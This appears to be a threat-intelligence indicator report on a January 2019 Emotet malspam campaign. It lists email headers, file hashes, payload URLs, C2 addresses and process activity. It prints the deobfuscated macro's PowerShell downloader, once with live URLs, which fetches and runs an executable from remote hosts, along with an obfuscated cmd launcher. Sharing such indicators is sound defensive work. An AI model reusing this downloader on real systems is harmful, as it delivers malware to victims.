#emotet_280119

1. #IOC #OptiData #VR #emotet #feodo #banker #xml #powershell
2.  
3. https://pastebin.com/z2TDfM7s
4.  
5. previous contact:
6. 23/01/18 https://pastebin.com/D9TDts5J
7. 20/12/18 https://pastebin.com/EejcbL4t
8. 04/12/18 https://pastebin.com/znQDtbnt
9. 09/11/18 https://pastebin.com/THHMs2wg
10. 01/10/18 https://pastebin.com/Y6DnbpHv
11.  
12. FAQ:
13. https://twitter.com/dvk01uk/status/1087660817452011520
14. https://pastebin.com/g8gMJKui
15. https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
16. https://kc.mcafee.com/corporate/index?page=content&id=KB90108
17.  
18. attack_vector
19. --------------
20. email attach .doc (XML) > macro > cmd > powershell_v5(!) > GET 5 URL > %temp%\***.exe
21.  
22. email_headers
23. --------------
24. Received: from qproxy4-pub.mail.unifiedlayer.com (qproxy4-pub.mail.unifiedlayer.com [66.147.248.250])
25. by srv8.victim1.com for <user0@org7.victim1.com>;
26. (envelope-from muhammad.suleman@ff.com.pk)
27. Received: from cmgw11.unifiedlayer.com (unknown [10.9.0.11])
28. by qproxy4.mail.unifiedlayer.com (Postfix) for <user0@org7.victim1.com>;
29. Received: from box675.bluehost.com ([66.147.244.175])
30. Received: from [190.183.58.77] (port=59810 helo=10.4.44.65)
31. by box675.bluehost.com (envelope-from <muhammad.suleman@ff.com.pk>)
32. Date: Mon, 28 Jan 2019 04:03:36 -0300
33. From: Цимбаленко <otsimbalenko@org0.ua> <muhammad.suleman@ff.com.pk>
34. To: user0@org7.victim1.com
35. Subject: Invoices from Цимбаленко
36.  
37. files
38. --------------
39. SHA-256 4e4074f7239656bdf361fc6bc8df862ed053105036d3bfad718f6492bc313465
40. File name INV_JSO9316077-679.doc (XML)
41. File size 134.98 KB
42.  
43. SHA-256 79d4e70bf4c1f9eb8dc0c6e765fc2f5d1f48737fc0859a8a1130d99e65e441a2
44. File name 0C0sib5OX.exe (PE)
45. File size 140 KB
46.  
47. activity
48. **************
49.  
50. deobfuscated_macro
51. --------------
52. powershell $apcjv='quduu';$wajal=new-object Net.WebClient;$dhbwoqn='tunerg{.} com/VhIZE8i3Fn@stoutarc{.} com@leonardokubrick{.} com/VvJBwtEF5w@antigua.aguilarnoticias{.} com/t1JnOLFO@regenerationcongo{.} com/UL2s3PGpv0'.Split('@');$vwhpj='wnwumd';$tzimwc = '604';$cktii='fppqf';$wvmjf=$env:temp+'\'+$tzimwc+'.exe';foreach($kkffho in $dhbwoqn){try{$wajal.DownloadFile($kkffho, $wvmjf);$ksimd='hwori';If ((Get-Item $wvmjf).length -ge 40000) {Invoke-Item $wvmjf;$oikri='kbccf';break;}}catch{}}$zqlki='cirmiw';
53.  
54.  
55. pl_src: 4/5
56. --------------
57. tunerg{.} com/VhIZE8i3Fn 200
58. stoutarc{.} com 200
59. leonardokubrick{.} com/VvJBwtEF5w 200
60. antigua.aguilarnoticias{.} com/t1JnOLFO 404 (reported)
61. regenerationcongo{.} com/UL2s3PGpv0 200
62.  
63. C2:
64. --------------
65. 187.155.130.72:8080
66.  
67. netwrk
68. --------------
69. 210.188.201.17 tunerg{.} com GET /VhIZE8i3Fn HTTP/1.1 noUA
70. 187.155.130.72:8080
71.  
72. comp
73. --------------
74. powershtll.exe 2676 TCP 210.188.201.17 80 ESTABLISHED
75. turnedbased.exe 1648 TCP 201.194.127.211 990 SYN_SENT
76.  
77. proc
78. --------------
79. C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
80. c:\windows\system32\cmd.exe c:\oucvl\ffaiizm\klfrwkw\..\..\..\windows\system32\cmd.exe /c CmD /V:O/C"set vb=eL{~6'1i0fp;S4oFl2u@g.dwGUJ:EsyTh(CPb\czNmVvD=xkW$AZa-I )3}n/M8+%OB,5qrjt&&for %Z in ...do set ao=!ao!!vb:~%Z,1!&&if %Z==83 echo !ao:~-577!|cmd.exe"
81. C:\Windows\system32\cmd.exe CmD /V:O/C"set vb=eL{~6'1i0fp;S4oFl2u@g.dwGUJ:EsyTh(CPb\czNmVvD=xkW$AZa-I )3}n/M8+%OB,5qrjt&&for %Z in ...do set ao=!ao!!vb:~%Z,1!&&if %Z==83 echo !ao:~-577!|cmd.exe"
82. C:\Windows\system32\cmd.exe
83. C:\Windows\System32\WindowsPowerShell\v1.0\powershtll.exe powershtll $apcjv='quduu';$wajal=new-object Net.WebClient;$dhbwoqn='http://tunerg.com/VhIZE8i3Fn@http://stoutarc.com/J8htynMd3@http://leonardokubrick.com/VvJBwtEF5w@http://antigua.aguilarnoticias.com/t1JnOLFO@http://regenerationcongo.com/UL2s3PGpv0'.Split('@');$vwhpj='wnwumd';$tzimwc = '604';$cktii='fppqf';$wvmjf=$env:temp+'\'+$tzimwc+'.exe';foreach($kkffho in $dhbwoqn){try{$wajal.DownloadFile($kkffho, $wvmjf);$ksimd='hwori';If ((Get-Item $wvmjf).length -ge 40000) {Invoke-Item $wvmjf;$oikri='kbccf';break;}}catch{}}$zqlki='cirmiw';
84. C:\tmp\604.exe
85. C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
86.  
87. persist
88. --------------
89. n/a
90.  
91. drop
92. --------------
93. C:\tmp\604.exe
94. C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
95.  
96. # # #
97. https://www.virustotal.com/#/file/4e4074f7239656bdf361fc6bc8df862ed053105036d3bfad718f6492bc313465/details
98. https://www.virustotal.com/#/file/79d4e70bf4c1f9eb8dc0c6e765fc2f5d1f48737fc0859a8a1130d99e65e441a2/details
99. https://analyze.intezer.com/#/analyses/0bb6533d-294a-45ab-a85b-6b546e993db3
100.  
101. VR
102.  
103. @